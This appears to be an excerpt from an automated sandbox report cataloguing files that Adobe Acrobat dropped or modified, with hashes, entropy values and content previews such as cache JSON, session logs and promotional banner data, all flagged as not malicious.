                                                                                        Preview:{"net":{"http_server_properties":{"servers":[{"isolation":[],"server":"https://armmf.adobe.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13341048370594526","port":443,"protocol_str":"quic"}],"isolation":[],"network_stats":{"srtt":151499},"server":"https://chrome.cloudflare-dns.com","supports_spdy":true}],"supports_quic":{"address":"192.168.2.6","used_quic":true},"version":5},"network_qualities":{"CAESABiAgICA+P////8B":"3G"}}}
                                                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                        File Type:JSON data
                                                                                        Category:dropped
                                                                                        Size (bytes):475
                                                                                        Entropy (8bit):4.971824627296864
                                                                                        Encrypted:false
                                                                                        SSDEEP:12:YH/um3RA8sq1ZhsBdOg2HIJnAcaq3QYiubcP7E4TX:Y2sRdswydMH0r3QYhbA7n7
                                                                                        MD5:F326539D084B03D88254A74D6018F692
                                                                                        SHA1:395B367E0E3554C3E78A8211F2D4B9F0F427CA87
                                                                                        SHA-256:9379694CADD7846403E1B6975502326FBC619E0E3A873BBB7BC2C03EE3623007
                                                                                        SHA-512:C8B5B1DD28605D3FCD9EF4A28BE1125137E6B3CB967F59CB2113656C8EFFFB3842115962DF8B25E9C3FA504F5E1B0A116D780326B1AB8062DC6AC0D80E7C3539
                                                                                        Malicious:false
                                                                                        Preview:{"net":{"http_server_properties":{"servers":[{"isolation":[],"server":"https://armmf.adobe.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13341048370594526","port":443,"protocol_str":"quic"}],"isolation":[],"network_stats":{"srtt":151499},"server":"https://chrome.cloudflare-dns.com","supports_spdy":true}],"supports_quic":{"address":"192.168.2.6","used_quic":true},"version":5},"network_qualities":{"CAESABiAgICA+P////8B":"3G"}}}
                                                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                        File Type:JSON data
                                                                                        Category:modified
                                                                                        Size (bytes):475
                                                                                        Entropy (8bit):4.9710571999777065
                                                                                        Encrypted:false
                                                                                        SSDEEP:12:YH/um3RA8sq3sBdOg2H/dtcaq3QYiubcP7E4TX:Y2sRdsldMH/C3QYhbA7n7
                                                                                        MD5:2A01ED60D54DF06386E1179243B0D7BA
                                                                                        SHA1:05F6E3CF5C4D4E804ADA43A1A68AF3BC8D833F4C
                                                                                        SHA-256:1211D0F1CF7E76A9A1BD0182AEE232CBDA01E2C72BD26350EFFEEADB09EA2D95
                                                                                        SHA-512:B8722734EE5EE99E551168502BDD041759FB219B216EE6EB4F22F594EDB258F7D9DAF561F778B48FF321CA133CC95962FF0170E5AF8A95EE5850FBD8A5ED0C24
                                                                                        Malicious:false
                                                                                        Preview:{"net":{"http_server_properties":{"servers":[{"isolation":[],"server":"https://armmf.adobe.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13379169180576278","port":443,"protocol_str":"quic"}],"isolation":[],"network_stats":{"srtt":641868},"server":"https://chrome.cloudflare-dns.com","supports_spdy":true}],"supports_quic":{"address":"192.168.2.6","used_quic":true},"version":5},"network_qualities":{"CAESABiAgICA+P////8B":"3G"}}}
                                                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                        File Type:data
                                                                                        Category:dropped
                                                                                        Size (bytes):5449
                                                                                        Entropy (8bit):5.250148281822142
                                                                                        Encrypted:false
                                                                                        SSDEEP:96:av+Nkkl+2GAouz3z3xfNLUS3vHp5OuDzUrMzh28qXAXFP74LRXOtW7ANwE7YP2Il:av+Nkkl+2G1uz3zhfZUyPp5OuDzUwzhO
                                                                                        MD5:01D66819A3505D0F426D6413E2AAFC17
                                                                                        SHA1:AD6644C9C821EC6B67DE15F4FB1B85BDFF4A69D1
                                                                                        SHA-256:458CBB90C77C463FDDBDB6341FAAE8B25A8783E04B31EDF9CA2860B2027B2856
                                                                                        SHA-512:D3290064C6CD849B9156AA9A62ED5229C9C1B710D578E177014DBB5CB6945A9CC9EE8861EB92DA6417D2508DF85D732028B9B4A1624528DEB2BE00965931A22F
                                                                                        Malicious:false
                                                                                        Preview:*...#................version.1..namespace-.X.Bo................next-map-id.1.Pnamespace-c291b69d_46f8_4b09_b54e_d05df8a1271d-https://rna-resource.acrobat.com/.0.>j.r................next-map-id.2.Snamespace-63b958a8_6f71_4fde_913c_6518794b9fd1-https://rna-v2-resource.acrobat.com/.1.J.4r................next-map-id.3.Snamespace-37e4c694_2a8d_4b31_9eb8_e65c5f9e16d5-https://rna-v2-resource.acrobat.com/.2..J.o................next-map-id.4.Pnamespace-d7426d52_3038_4cd9_b9cc_897232425509-https://rna-resource.acrobat.com/.3..M.^...............Pnamespace-c291b69d_46f8_4b09_b54e_d05df8a1271d-https://rna-resource.acrobat.com/..d.^...............Pnamespace-d7426d52_3038_4cd9_b9cc_897232425509-https://rna-resource.acrobat.com/.u..a...............Snamespace-63b958a8_6f71_4fde_913c_6518794b9fd1-https://rna-v2-resource.acrobat.com/..`aa...............Snamespace-37e4c694_2a8d_4b31_9eb8_e65c5f9e16d5-https://rna-v2-resource.acrobat.com/`v.Yo................next-map-id.5.Pnamespace-30587558_ed88_4bd8_adc0_
                                                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                        File Type:ASCII text
                                                                                        Category:dropped
                                                                                        Size (bytes):330
                                                                                        Entropy (8bit):5.156058139965514
                                                                                        Encrypted:false
                                                                                        SSDEEP:6:7INxN+q2PN72nKuAl9OmbzNMxIFUt8OIqWWZmw+OIPuUNVkwON72nKuAl9OmbzNq:7m+vVaHAa8jFUt8Ov/+OyrV5OaHAa84J
                                                                                        MD5:C32D972E51F793AE7B7B6CC3C61121FF
                                                                                        SHA1:7CA10AEBDF8D3E28CE5EF64612DB608BDAE211FE
                                                                                        SHA-256:B71965F73B5349257392A505F301093245E5BF018B12B1F86A49BB301C0A134C
                                                                                        SHA-512:A99979D31C7A1FABA7928522B5A5B5F589F0C7C83A05E1EB8F8A1444DF533250FCD091A6FEAD4EB19C1B99923FD5AA019B0A82C580360A8A3DA4CBF2B1A295F5
                                                                                        Malicious:false
                                                                                        Preview:2024/12/19-06:52:49.025 120c Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage/MANIFEST-000001.2024/12/19-06:52:49.026 120c Recovering log #3.2024/12/19-06:52:49.027 120c Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage/000003.log .
                                                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                        File Type:ASCII text
                                                                                        Category:dropped
                                                                                        Size (bytes):330
                                                                                        Entropy (8bit):5.156058139965514
                                                                                        Encrypted:false
                                                                                        SSDEEP:6:7INxN+q2PN72nKuAl9OmbzNMxIFUt8OIqWWZmw+OIPuUNVkwON72nKuAl9OmbzNq:7m+vVaHAa8jFUt8Ov/+OyrV5OaHAa84J
                                                                                        MD5:C32D972E51F793AE7B7B6CC3C61121FF
                                                                                        SHA1:7CA10AEBDF8D3E28CE5EF64612DB608BDAE211FE
                                                                                        SHA-256:B71965F73B5349257392A505F301093245E5BF018B12B1F86A49BB301C0A134C
                                                                                        SHA-512:A99979D31C7A1FABA7928522B5A5B5F589F0C7C83A05E1EB8F8A1444DF533250FCD091A6FEAD4EB19C1B99923FD5AA019B0A82C580360A8A3DA4CBF2B1A295F5
                                                                                        Malicious:false
                                                                                        Preview:2024/12/19-06:52:49.025 120c Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage/MANIFEST-000001.2024/12/19-06:52:49.026 120c Recovering log #3.2024/12/19-06:52:49.027 120c Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage/000003.log .
                                                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                        File Type:PC bitmap, Windows 3.x format, 107 x -152 x 32, cbSize 65110, bits offset 54
                                                                                        Category:dropped
                                                                                        Size (bytes):65110
                                                                                        Entropy (8bit):0.6376462682686903
                                                                                        Encrypted:false
                                                                                        SSDEEP:96:Fn1AGmY2nTLKnzN4lu1/4uy47rHMMMxAz:FsY2XQzyQnuc
                                                                                        MD5:1468EB269F45D6EECE72317AF6B1587F
                                                                                        SHA1:AB52469CD54F341F71D8EEA78E5293C597CC2560
                                                                                        SHA-256:56B0D18154217AEBE5F78DAA5DAF7861967BB4B615B7D1FFCDBC3C98C8834393
                                                                                        SHA-512:FFEF2EC31529E6165D9549A150FC8DA65917002B81A8E4747853AC7F51D88B3AC545862D5EB39684064EE600140C9D0BDAA97D14067C01AA24B17419950781FA
                                                                                        Malicious:false
                                                                                        Preview:BMV.......6...(...k...h..... ...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3040000, file counter 11, database pages 21, cookie 0x5, schema 4, UTF-8, version-valid-for 11
                                                                                        Category:dropped
                                                                                        Size (bytes):86016
                                                                                        Entropy (8bit):4.444731358701793
                                                                                        Encrypted:false
                                                                                        SSDEEP:384:ye6ci5tRiBA7aDQPsknQ0UNCFOa14ocOUw6zyFzqFkdZ+EUTTcdUZ5yDQhJL:mis3OazzU89UTTgUL
                                                                                        MD5:D0C70E2A7380FC74D89B45EEC5F3740F
                                                                                        SHA1:D56F107FD7D87D4B1F3D081B0B79FD7BB538476C
                                                                                        SHA-256:B528A9BC9E21ABEFAF99FC37B88025A4AA7A589F5C9D3473438596FF3D7311ED
                                                                                        SHA-512:95F1C921D88CA5A00057E88D98089A77E742F8B58E41C4C04C443C6279C551C79D378C65CBE6426C0112942D5C7A8D6750B1763BF8C0801161E1D67BDFE734DC
                                                                                        Malicious:false
                                                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                        File Type:SQLite Rollback Journal
                                                                                        Category:dropped
                                                                                        Size (bytes):8720
                                                                                        Entropy (8bit):3.763969027574141
                                                                                        Encrypted:false
                                                                                        SSDEEP:48:7M0JioyVaioysoy1C7oy16oy1UKOioy1noy1AYoy1Wioy1oioykioyBoy1noy1Os:7DJuaovXjBifb9IVXEBodRBkD
                                                                                        MD5:5698B73A9EFFD03BDE8A072C3E61F6AC
                                                                                        SHA1:84CF503D7BEC5BAD94E85E61F9C6D022E5774F0B
                                                                                        SHA-256:F9743A24BCCE0C28C2E91D4EE4CF8911EA40C6C36A87CAE4081882D3A5F5A4EF
                                                                                        SHA-512:9E7478683F32423EF889BF4A5BE7B6411094800E88FB6FF2B003BBEA798A8308FA3FE988CDF6C06E87D4479BA5A6A7A4BB144B856CC1B2914303DA10134B641D
                                                                                        Malicious:false
                                                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                        File Type:Certificate, Version=3
                                                                                        Category:dropped
                                                                                        Size (bytes):1391
                                                                                        Entropy (8bit):7.705940075877404
                                                                                        Encrypted:false
                                                                                        SSDEEP:24:ooVdTH2NMU+I3E0Ulcrgdaf3sWrATrnkC4EmCUkmGMkfQo1fSZotWzD1:ooVguI3Kcx8WIzNeCUkJMmSuMX1
                                                                                        MD5:0CD2F9E0DA1773E9ED864DA5E370E74E
                                                                                        SHA1:CABD2A79A1076A31F21D253635CB039D4329A5E8
                                                                                        SHA-256:96BCEC06264976F37460779ACF28C5A7CFE8A3C0AAE11A8FFCEE05C0BDDF08C6
                                                                                        SHA-512:3B40F27E828323F5B91F8909883A78A21C86551761F27B38029FAAEC14AF5B7AA96FB9F9CC93EE201B5EB1D0FEF17B290747E8B839D2E49A8F36C5EBF3C7C910
                                                                                        Malicious:false
                                                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                        File Type:data
                                                                                        Category:dropped
                                                                                        Size (bytes):192
                                                                                        Entropy (8bit):2.756901573172974
                                                                                        Encrypted:false
                                                                                        SSDEEP:3:kkFkl/nefllXlE/HT8kvFlh/tNNX8RolJuRdxLlGB9lQRYwpDdt:kKkT8mfRNMa8RdWBwRd
                                                                                        MD5:1867D3DADE7A56999F90E54D7A35D9A9
                                                                                        SHA1:412925BCA7F3E413E1A4543343CED0C3A5B25A93
                                                                                        SHA-256:FAC4D9B0FFA1A1E901B7EBC66A8EBDC264D9341ABA67A5AB10B33975AD0B2FC7
                                                                                        SHA-512:4EE0831E60ECB2D1E36034C2D53343A21200195F5F8856EE4EC4ED7D5691569C871E6C46FFCC3F3C06E69F3D27477DB0C240265410E0EC6220B0882C35874ED7
                                                                                        Malicious:false
                                                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                        File Type:JSON data
                                                                                        Category:dropped
                                                                                        Size (bytes):295
                                                                                        Entropy (8bit):5.339679110304712
                                                                                        Encrypted:false
                                                                                        SSDEEP:6:YEQXJ2HX46+nZiQ0YIoAvJM3g98kUwPeUkwRe9:YvXKX4/ccGMbLUkee9
                                                                                        MD5:381CB05BE1414EDF08F973274EE27A3E
                                                                                        SHA1:82AF8D519806671C41DEAC3C7928C6FC2549E990
                                                                                        SHA-256:8AD4C663E599A3B7DEA06B5860BA649E17901AD824D9954DE9770CF1C6E829F6
                                                                                        SHA-512:80A16CD4FB1E9447DFA3DA147E5153EE1E561512C8FAD730A405DA6F7C337732259E3C507BC573A8B32A648E49CF6B2451FA8757974BEDF58010BA445111D058
                                                                                        Malicious:false
                                                                                        Preview:{"analyticsData":{"responseGUID":"f0441a81-060b-4f05-ac10-cb14b80ea542","sophiaUUID":"7B9B8415-3339-46DA-BE0A-54DDE09AC518"},"encodingScheme":true,"expirationDTS":1734785715359,"statusCode":200,"surfaceID":"ACROBAT_READER_MASTER_SURFACEID","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                        File Type:JSON data
                                                                                        Category:dropped
                                                                                        Size (bytes):294
                                                                                        Entropy (8bit):5.292295272548499
                                                                                        Encrypted:false
                                                                                        SSDEEP:6:YEQXJ2HX46+nZiQ0YIoAvJfBoTfXpnrPeUkwRe9:YvXKX4/ccGWTfXcUkee9
                                                                                        MD5:38885190BC1DECC768AF98D8A34A5940
                                                                                        SHA1:837F4ED548424A9C63895FC8061B73E4081A896F
                                                                                        SHA-256:A11097147F1D15B44DF34B21B34211DF5A0090F6EC003B1D43B855BC48C40ADA
                                                                                        SHA-512:B6663A27C71F0EE72DAB8DA1CF0A553A452C28649A1E7C6745BF34D5C0D11D7DEF1F80A322D8E8B714798BB387D308F64944EBF7F81073754FE25F75CE4C1517
                                                                                        Malicious:false
                                                                                        Preview:{"analyticsData":{"responseGUID":"f0441a81-060b-4f05-ac10-cb14b80ea542","sophiaUUID":"7B9B8415-3339-46DA-BE0A-54DDE09AC518"},"encodingScheme":true,"expirationDTS":1734785715359,"statusCode":200,"surfaceID":"DC_FirstMile_Home_View_Surface","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                        File Type:JSON data
                                                                                        Category:dropped
                                                                                        Size (bytes):294
                                                                                        Entropy (8bit):5.270554767906305
                                                                                        Encrypted:false
                                                                                        SSDEEP:6:YEQXJ2HX46+nZiQ0YIoAvJfBD2G6UpnrPeUkwRe9:YvXKX4/ccGR22cUkee9
                                                                                        MD5:D0451E121AD2CAFC1EDFCDE0FFDF0190
                                                                                        SHA1:EFFAC4407E43BC9BCC7CC25AFF2120D4B8A9E8DF
                                                                                        SHA-256:5B28BFA608EFCB0B679414048C958D009680B0AD177BAAC9828E9A5DCB5831A8
                                                                                        SHA-512:B79018E116A6375A77CA1E573DBEB0EA6C8112762E676BA5ED1B25B3B9E366F9BD89ABCB1E20FC3613B7D96BAB0DEA7AD3E726D45D96F80807615C5513F3716E
                                                                                        Malicious:false
                                                                                        Preview:{"analyticsData":{"responseGUID":"f0441a81-060b-4f05-ac10-cb14b80ea542","sophiaUUID":"7B9B8415-3339-46DA-BE0A-54DDE09AC518"},"encodingScheme":true,"expirationDTS":1734785715359,"statusCode":200,"surfaceID":"DC_FirstMile_Right_Sec_Surface","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                        File Type:JSON data
                                                                                        Category:dropped
                                                                                        Size (bytes):285
                                                                                        Entropy (8bit):5.31887065874014
                                                                                        Encrypted:false
                                                                                        SSDEEP:6:YEQXJ2HX46+nZiQ0YIoAvJfPmwrPeUkwRe9:YvXKX4/ccGH56Ukee9
                                                                                        MD5:D67A39386C9E3D971B0FB83D2E299EB2
                                                                                        SHA1:42355D66A202ED7255B81AD4CEED4168C665540C
                                                                                        SHA-256:06EA484A7676C62E5B11E6FE2574C9D4F0511218FD8D80691CB6306C1A809DE1
                                                                                        SHA-512:7946C5546090BFAC9B9C4BB449705E223F32612728CDB1B2967DEEB69B969D319CC60F2FC6F129AE4C050EBA5C83305D3CB6C3AF7240E14F88D5D7EBDEAD019C
                                                                                        Malicious:false
                                                                                        Preview:{"analyticsData":{"responseGUID":"f0441a81-060b-4f05-ac10-cb14b80ea542","sophiaUUID":"7B9B8415-3339-46DA-BE0A-54DDE09AC518"},"encodingScheme":true,"expirationDTS":1734785715359,"statusCode":200,"surfaceID":"DC_READER_LAUNCH_CARD","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                        File Type:JSON data
                                                                                        Category:dropped
                                                                                        Size (bytes):1123
                                                                                        Entropy (8bit):5.690610676137315
                                                                                        Encrypted:false
                                                                                        SSDEEP:24:Yv6X4kZpLgE9cQx8LennAvzBvkn0RCmK8czOCCSf:Yv9Yhgy6SAFv5Ah8cv/f
                                                                                        MD5:2DC0AB607F0B98CE2C1FAF6511509C62
                                                                                        SHA1:7974BFCEC89322EA8C254046A223F7A3C1888150
                                                                                        SHA-256:3E694FD10493A74A775DC405F6DEF5CCB132BBA5458A23787F86EDECF2AF428B
                                                                                        SHA-512:F99306BECE7844DE9792DEDBD201F77B9EE87DB8D40D1A58EB7F2590C5C6E11B3691BF52A67001B2B6639FA3AC554447A2B9A47E84F647EDF6F484C98900846E
                                                                                        Malicious:false
                                                                                        Preview:{"analyticsData":{"responseGUID":"f0441a81-060b-4f05-ac10-cb14b80ea542","sophiaUUID":"7B9B8415-3339-46DA-BE0A-54DDE09AC518"},"encodingScheme":true,"expirationDTS":1734785715359,"statusCode":200,"surfaceID":"DC_Reader_Convert_LHP_Banner","surfaceObj":{"SurfaceAnalytics":{"surfaceId":"DC_Reader_Convert_LHP_Banner"},"containerMap":{"1":{"containerAnalyticsData":{"actionBlockId":"93365_289436ActionBlock_1","campaignId":93365,"containerId":"1","controlGroupId":"","treatmentId":"d5bba1ae-6009-4d23-8886-fd4a474b8ac9","variationId":"289436"},"containerId":1,"containerLabel":"JSON for DC_Reader_Convert_LHP_Banner","content":{"data":"eyJjdGEiOnsidGV4dCI6IkZyZWUgdHJpYWwiLCJjbGljayI6Im9wZW5Ub29sIiwidG9vbF9pZCI6IkNvbnZlcnRQREZSZHJSSFBBcHAifSwidWkiOnsidGl0bGVfc3R5bGluZyI6eyJmb250X3NpemUiOiIxNHB4IiwiZm9udF9zdHlsZSI6IjAifSwiZGVzY3JpcHRpb25fc3R5bGluZyI6eyJmb250X3NpemUiOiIxMnB4IiwiZm9udF9zdHlsZSI6Ii0xIn0sInRpdGxlIjpudWxsLCJkZXNjcmlwdGlvbiI6IkV4cG9ydCBQREZzIHRvIE1pY3Jvc29mdCBXb3JkIGFuZCBFeGNlbC4ifSwidGNh
                                                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                        File Type:JSON data
                                                                                        Category:dropped
                                                                                        Size (bytes):289
                                                                                        Entropy (8bit):5.271560889804696
                                                                                        Encrypted:false
                                                                                        SSDEEP:6:YEQXJ2HX46+nZiQ0YIoAvJf8dPeUkwRe9:YvXKX4/ccGU8Ukee9
                                                                                        MD5:91D20AFB796A9834A2C3D1978E72D982
                                                                                        SHA1:AB75870A0F59E9B6409476B308360E173888B02D
                                                                                        SHA-256:5CD6B2357F9E090B59BB4C98ECED7186B724D7A7B1E0BFF0578085D5E4DA2317
                                                                                        SHA-512:AF8D7D94F666D15708C09682D33CBDD188DA6015595321FADDA8A40788F2AE2AC1A337B15B8B1BFF817EA1274CAD9D9FB0789631AC2C43EDCBD27199549275BE
                                                                                        Malicious:false
                                                                                        Preview:{"analyticsData":{"responseGUID":"f0441a81-060b-4f05-ac10-cb14b80ea542","sophiaUUID":"7B9B8415-3339-46DA-BE0A-54DDE09AC518"},"encodingScheme":true,"expirationDTS":1734785715359,"statusCode":200,"surfaceID":"DC_Reader_Disc_LHP_Banner","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                        File Type:JSON data
                                                                                        Category:dropped
                                                                                        Size (bytes):292
                                                                                        Entropy (8bit):5.27508692337727
                                                                                        Encrypted:false
                                                                                        SSDEEP:6:YEQXJ2HX46+nZiQ0YIoAvJfQ1rPeUkwRe9:YvXKX4/ccGY16Ukee9
                                                                                        MD5:9E85DBBCE63B9A8AFFCAD5F3F89AAF40
                                                                                        SHA1:6B01747A375BF0288A5D6BB4B12FC5D6941792D4
                                                                                        SHA-256:CA737675C1F328E35EB467180667F940C76F272B6013719D6F8F2AD4E4FEBAE3
                                                                                        SHA-512:C715964D99194199749DA8A1AABF356902F2D0F933505594C44B95B15E886469393AD2EB3B7F9A40E53BE7021C3B705BE701867149A5E3A82E1F98355F651D0D
                                                                                        Malicious:false
                                                                                        Preview:{"analyticsData":{"responseGUID":"f0441a81-060b-4f05-ac10-cb14b80ea542","sophiaUUID":"7B9B8415-3339-46DA-BE0A-54DDE09AC518"},"encodingScheme":true,"expirationDTS":1734785715359,"statusCode":200,"surfaceID":"DC_Reader_Disc_LHP_Retention","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                        File Type:JSON data
                                                                                        Category:dropped
                                                                                        Size (bytes):289
                                                                                        Entropy (8bit):5.284311940721448
                                                                                        Encrypted:false
                                                                                        SSDEEP:6:YEQXJ2HX46+nZiQ0YIoAvJfFldPeUkwRe9:YvXKX4/ccGz8Ukee9
                                                                                        MD5:94EB358628B4B2FE01AC347DB28D0DD9
                                                                                        SHA1:7587D1CD160A02BE76E60CFA4AFAA9ACFC7D3ED3
                                                                                        SHA-256:2A546242DCCF93176D65C5C30C328D92128EFE28A88710A2700F532090814722
                                                                                        SHA-512:9B6643A2B762CBC8282581748B51E3656D944CD2111D70C3F287773813CD837887A2D8BD522A7227F1788CAB16C4140A4F92D0890C2F54B419AA9393EB8DE7B7
                                                                                        Malicious:false
                                                                                        Preview:{"analyticsData":{"responseGUID":"f0441a81-060b-4f05-ac10-cb14b80ea542","sophiaUUID":"7B9B8415-3339-46DA-BE0A-54DDE09AC518"},"encodingScheme":true,"expirationDTS":1734785715359,"statusCode":200,"surfaceID":"DC_Reader_Edit_LHP_Banner","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                        File Type:JSON data
                                                                                        Category:dropped
                                                                                        Size (bytes):295
                                                                                        Entropy (8bit):5.298831887454261
                                                                                        Encrypted:false
                                                                                        SSDEEP:6:YEQXJ2HX46+nZiQ0YIoAvJfzdPeUkwRe9:YvXKX4/ccGb8Ukee9
                                                                                        MD5:886AE199AD8A375E50532A41B434DF78
                                                                                        SHA1:03A43CE70597F8A59FB24878DAB3CD94E23C1CD8
                                                                                        SHA-256:AE2948F36854F4CA8AADE3FAC318A8198226D1BCC5CBF076DB731B1B2571FA50
                                                                                        SHA-512:5EEFFB18A4D570A8328F19A6AEE0FB2C647CE5528E525BF8AF32AC2AE67C3FE117C3A58EEFC309F4A0FC2F2DBDE7ECE27412C55DCF5F0EF12D7411B2A1E409D6
                                                                                        Malicious:false
                                                                                        Preview:{"analyticsData":{"responseGUID":"f0441a81-060b-4f05-ac10-cb14b80ea542","sophiaUUID":"7B9B8415-3339-46DA-BE0A-54DDE09AC518"},"encodingScheme":true,"expirationDTS":1734785715359,"statusCode":200,"surfaceID":"DC_Reader_Home_LHP_Trial_Banner","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                        File Type:JSON data
                                                                                        Category:dropped
                                                                                        Size (bytes):289
                                                                                        Entropy (8bit):5.27932684339049
                                                                                        Encrypted:false
                                                                                        SSDEEP:6:YEQXJ2HX46+nZiQ0YIoAvJfYdPeUkwRe9:YvXKX4/ccGg8Ukee9
                                                                                        MD5:AEB30E5581DE750A4BF616403C85175F
                                                                                        SHA1:FF6A190856930CBE591D785AE0B595D4B4B6212A
                                                                                        SHA-256:0FCC6665E128F5813920A81D64D90ACA0CF522962B84A216CC78DADD1595C570
                                                                                        SHA-512:A1773BBA334601BDEB5C60FB977F884625B1531B556B4C468CD4162A8B5C2F28F745FF82734BF72680DB7498CBB5CB7385F6CA22383FCBD2E8165AFB11406EB4
                                                                                        Malicious:false
                                                                                        Preview:{"analyticsData":{"responseGUID":"f0441a81-060b-4f05-ac10-cb14b80ea542","sophiaUUID":"7B9B8415-3339-46DA-BE0A-54DDE09AC518"},"encodingScheme":true,"expirationDTS":1734785715359,"statusCode":200,"surfaceID":"DC_Reader_More_LHP_Banner","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                        File Type:JSON data
                                                                                        Category:dropped
                                                                                        Size (bytes):284
                                                                                        Entropy (8bit):5.265013252188548
                                                                                        Encrypted:false
                                                                                        SSDEEP:6:YEQXJ2HX46+nZiQ0YIoAvJf+dPeUkwRe9:YvXKX4/ccG28Ukee9
                                                                                        MD5:9B0C6280C83A0D835F6D8B604187AE80
                                                                                        SHA1:EE46D8977BE176C0A0502112420DF0A67F0668A3
                                                                                        SHA-256:47776891D93DE697D7CFBA25A7BDAE697DD28421C9E5767E86029732D6A1C040
                                                                                        SHA-512:9F380E22C0234797BC6367DC66F4957500528A3F4CDDA5C9997F3B732CF5C5040ECA78B4EA32B5EF904EFC1D4C243F2FA624C2875E8BC803E8974FE55F613BEB
                                                                                        Malicious:false
                                                                                        Preview:{"analyticsData":{"responseGUID":"f0441a81-060b-4f05-ac10-cb14b80ea542","sophiaUUID":"7B9B8415-3339-46DA-BE0A-54DDE09AC518"},"encodingScheme":true,"expirationDTS":1734785715359,"statusCode":200,"surfaceID":"DC_Reader_RHP_Banner","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                        File Type:JSON data
                                                                                        Category:dropped
                                                                                        Size (bytes):291
                                                                                        Entropy (8bit):5.2630160246149345
                                                                                        Encrypted:false
Malicious:false
Preview:{"analyticsData":{"responseGUID":"f0441a81-060b-4f05-ac10-cb14b80ea542","sophiaUUID":"7B9B8415-3339-46DA-BE0A-54DDE09AC518"},"encodingScheme":true,"expirationDTS":1734785715359,"statusCode":200,"surfaceID":"DC_Reader_RHP_Intent_Banner","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
File Type:JSON data
Category:dropped
Size (bytes):287
Entropy (8bit):5.266407063155739
Encrypted:false
Malicious:false
Preview:{"analyticsData":{"responseGUID":"f0441a81-060b-4f05-ac10-cb14b80ea542","sophiaUUID":"7B9B8415-3339-46DA-BE0A-54DDE09AC518"},"encodingScheme":true,"expirationDTS":1734785715359,"statusCode":200,"surfaceID":"DC_Reader_RHP_Retention","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
File Type:JSON data
Category:dropped
Size (bytes):1090
Entropy (8bit):5.667248036438856
Encrypted:false
Malicious:false
Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
File Type:JSON data
Category:dropped
Size (bytes):286
Entropy (8bit):5.244943275131366
Encrypted:false
Malicious:false
Preview:{"analyticsData":{"responseGUID":"f0441a81-060b-4f05-ac10-cb14b80ea542","sophiaUUID":"7B9B8415-3339-46DA-BE0A-54DDE09AC518"},"encodingScheme":true,"expirationDTS":1734785715359,"statusCode":200,"surfaceID":"DC_Reader_Upsell_Cards","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
File Type:JSON data
Category:dropped
Size (bytes):282
Entropy (8bit):5.249277346104674
Encrypted:false
Malicious:false
